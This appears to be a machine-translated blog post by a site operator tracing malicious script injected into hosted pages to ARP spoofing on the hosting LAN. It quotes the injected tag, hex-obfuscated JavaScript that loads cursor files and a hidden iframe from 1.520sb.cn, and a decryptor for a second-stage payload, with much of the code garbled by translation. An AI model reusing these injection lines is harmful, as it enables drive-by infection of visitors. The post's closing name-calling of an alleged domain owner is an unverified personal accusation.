Hexadecimal conversion: automatically transcodes when javascript is run.

At this time, check the page source code can find that the top of the page is added with a sentence <script src = http://1.520sb.cn/1.js> </script>
But this code does not often appear.
I thought the server was attacked or the server was infected with viruses.
Check all problematic pages and Related Files
No exception found
No intrusion marks were found on the server.

Download the js file to your local device. The following code is displayed:
Window ["\ x64 \ x6f \ x63 \ x75 \ x6d \ x65 \ x6e \ x74"] ["\ x77 \ x72 \ x69 \ x74 \ x65 \ x6c \ x6e"] ("\ x3c \ x44 \ x49 \ x56 \ x73 \ x74 \ x79 \ x6c \ x65 \ x3d \" \ x43 \ x55 \ x52 \ x53 \ x4f \ x52 \ x3a \ x75 \ x72 \ x6c \ x28 \ '\ x68 \ x74 \ x74 \ cross \ x3a \ // \ x31 \ x2e \ x35 \ x32 \ x30 \ x73 \ x62 \ x2e \ x63 \ x6e \/\ x6d \ x61 \/\ x31 \ x2e \ x6a \ x67 \ '\ x29 \ "\ x3e ");
Window ["\ x64 \ x6f \ x63 \ x75 \ x6d \ x65 \ x6e \ x74"] ["\ x77 \ x72 \ x69 \ x74 \ x65 \ x6c \ x6e"] ("\ x3c \ x44 \ x49 \ x56 \ x73 \ x74 \ x79 \ x6c \ x65 \ x3d \" \ x43 \ x55 \ x52 \ x53 \ x4f \ x52 \ x3a \ x75 \ x72 \ x6c \ x28 \ '\ x68 \ x74 \ x74 \ cross \ x3a \ // \ x31 \ x2e \ x35 \ x32 \ x30 \ x73 \ x62 \ x2e \ x63 \ x6e \/\ x6d \ x61 \/\ x32 \ x2e \ x6a \ x67 \ '\ x29 \ "\ x3e \ x3c \/\ x44 \ x49 \ x56 \ x3e \ x3c \/\ x44 \ x49 \ x56 \ x3e ");
Window ["\ x64 \ x6f \ x63 \ x75 \ x6d \ x65 \ x6e \ x74"] ["\ x77 \ x72 \ x69 \ x74 \ x65 \ x6c \ x6e"] ("\ x3c \ x69 \ x66 \ x72 \ x61 \ x6d \ x65 \ x73 \ x72 \ x63 \ x3d \ x68 \ x74 \ x74 \ x3a \ // \/\ x31 \ x2e \ x35 \ x32 \ x30 \ x73 \ x62 \ x2e \ x63 \ x6e \/\ x74 \ x6a \ x2e \ x68 \ x74 \ x6d \ x77 \ x69 \ x64 \ x74 \ x68 \ x3d \ x30 \ x68 \ x65 \ x69 \ x67 \ x68 \ x74 \ x3d \ x30 \ x3e \ x3c \/\ x69 \ x66 \ x72 \ x61 \ x6d \ x65 \ x3e ")

During hexadecimal conversion, the code is automatically transcoded when javascript is run. After the code is embedded, the code runs automatically when the webpage is opened.
We use the document. write statement to print the code to the page.
Window ["document"] ["writeln"] ("<DIV style =" CURSOR: url ('HTTP: // 1.520sb.cn/ma/1.jpg') "> "); window ["document"] ["writeln"] ("<DIV style =" CURSOR: url ('HTTP: // 1.520sb.cn/ma/2.jpg ') "> </DIV> "); window ["documents"] ["writeln"] ("<iframe src = http://1.520sb.cn/tj.htm width = 0 height = 0> </iframe> ")

Http://1.520sb.cn/ma/1.jpg and valve

Http://1.520sb.cn/mm/06014.htm's content is
<Script language = javascript>
Function utf8to16 (str) {var out, I, len, c; var char2, char3; out = []; len = str. length; I = 0; while (I <len) {c = str. charCodeAt (I ++); switch (c> 4)
{Case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: out [out. length] = str. charAt (I-1); break; case 12: case 13: char2 = str. charCodeAt (I ++); out [out. length] = String. fromCharCode (c & 0x1F) <6) | (char2 & 0x3F); break; case 14: char2 = str. charCodeAt (I ++); char3 = str. charCodeAt (I ++); out [out. length] = String. fromCharCode (c & 0x0F) <12) | (char2 & 0x3F) <6) | (char3 & 0x3F) <0); break ;}}
Return out. join ('');}
Var base64DecodeChars = new Array (-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, -1,-1,-1,-1,-1,-,-1,-1,-, 60, 61,-1, -1,-1,-1,-1,-1,-1,, 24, 25,-1,-1,-1,-1,-1,-, 27,28, 29,30, 31,32, 33,34, 35,36, 37,38, 39,40, 41,42, 43,44, 45, 46, 47,48, 49,50, 51,-1,-1,-1,-1,-1 );
Function base64decode (str)
{Var c1, c2, c3, c4; var I, len, out; len = str. length; I = 0; out = ""; while (I <len)
{Do
{C1 = base64DecodeChars [str. charCodeAt (I ++) & 0xff]} while (I <len & c1 =-1); if (c1 =-1)
Break; do
{C2 = base64DecodeChars [str. charCodeAt (I ++) & 0xff]} while (I <len & c2 =-1); if (c2 =-1)
Break; out + = String. fromCharCode (c1 <2) | (c2 & 0x30)> 4); do
{C3 = str. charCodeAt (I ++) & 0xff; if (c3 = 61)
Return out; c3 = base64DecodeChars [c3]} while (I <len & c3 =-1); if (c3 =-1)
Break; out + = String. fromCharCode (c2 & 0XF) <4) | (c3 & 0x3C)> 2); do
{C4 = str. charCodeAt (I ++) & 0xff; if (c4 = 61)
Return out; c4 = base64DecodeChars [c4]} while (I <len & c4 =-1); if (c4 =-1)
Break; out + = String. fromCharCode (c3 & 0x03) <6) | c4 )}
Return out}
Function long2str (v, w) {var vl = v. length; var sl = v [vl-1] & 0 xffffffff; for (var I = 0; I <vl; I ++)
{V [I] = String. fromCharCode (v [I] & 0xff, v [I] >>> 8 & 0xff, v [I] >>>> 16 & 0xff, v [I] >>> 24 & 0xff );}
If (w) {return v. join (''). substring (0, sl );}
Else {return v. join ('');}}
Function str2long (s, w) {var len = s. length; var v = []; for (var I = 0; I <len; I ++ = 4)
{V [I> 2] = s. charCodeAt (I) | s. charCodeAt (I + 1) <8 | s. charCodeAt (I + 2) <16 | s. charCodeAt (I + 3) <24 ;}
If (w) {v [v. length] = len ;}
Return v ;}
Function xxtea_decrypt (str, key) {if (str = "") {return "";}
Var v = str2long (str, false); var k = str2long (key, false); var n = v. length-1; var z = v [n-1], y = v [0], delta = 0x9E3779B9; var mx, e, q = Math. floor (6 + 52/(n + 1), sum = q * delta & 0 xffffffff; while (sum! = 0) {e = sum >>> 2 & 3; for (var p = n; p> 0; p --) {z = v [P-1]; mx = (z >>> 5 ^ y <2) + (y >>> 3 ^ z <4) ^ (sum ^ y) + (k [p & 3 ^ e] ^ z); y = v [p] = v [p]-mx & 0 xffffffff ;}
Z = v [n]; mx = (z >>> 5 ^ y <2) + (y >>> 3 ^ z <4) ^ (sum ^ y) + (k [p & 3 ^ e] ^ z); y = v [0] = v [0]-mx & 0 xffffffff; sum = sum-delta & 0 xffffffff ;}
Return long2str (v, true );}
T = "samples/Y74mVvPn26A0t/samples/rnNED15lBZ + samples/samples + mgNUlhUXA4 + iyLe + coding ++ 0kv/samples + VYhbnt9c/wnraw.gq/samples + h + response/response + response/aro7aQyiSFeOa8H 8h/0 + response + 17fOGiKU9L + response/response + response/P5lp3G/response + NlF3rCuf9eEw + 3L/response/ hhhK3YeGMPaO6uJlFkmLroHoZnYAi1/oDNGziqc61FE2m/large ";
T = utf8to16 (xxtea_decrypt (base64decode (t), 'fuck '));
Document. write (t );
</Script>

Record to be queried.
I did not find any indication that the server settings were changed or infiltrated. I searched for the 520sb online. Someone said: It's irrelevant to what you said. This is a type of arpsnifer, when packets are sent to the gateway, they are hijacked mainly because computers in the Intranet are controlled and some keywords are added through arp spoofing. Even simple html pages are added. Because of the instability of arp technology, the success rate of hijacking is different.
Haha. This is the last reason the customer has encountered. reinstalling the system is useless. Finding the computer is the key.
Http://www.im286.com/archiver/tid-1886972.html
Http://linux.chinaunix.net/bbs/thread-886420-4-1.html
That is to say, it is a problem with the server LAN.

Think of the small software that hichina has provided to bind the gateway ip address and mac address to prevent arp spoofing. After downloading the software, the system prompts that the binding is successful,
Refresh the website, but the inserted virus code still exists.

I called hichina to get a positive answer that is indeed arp spoofing. I was prompted to download their mac binding tool when I checked the problematic host on the next Monday, that is the small software I used to run. Let me restart it and try again.

So far, the problem seems to have been resolved, and the above records are to be queried.

As this blog is placed on the same server, please visit this blog this week to Upgrade anti-virus software in time and do a good job in anti-virus. If any loss is caused, I am sorry.

Ps: The domain name owner of 520sb.cn is an sb named Niu xiaopan. You can see this domain name.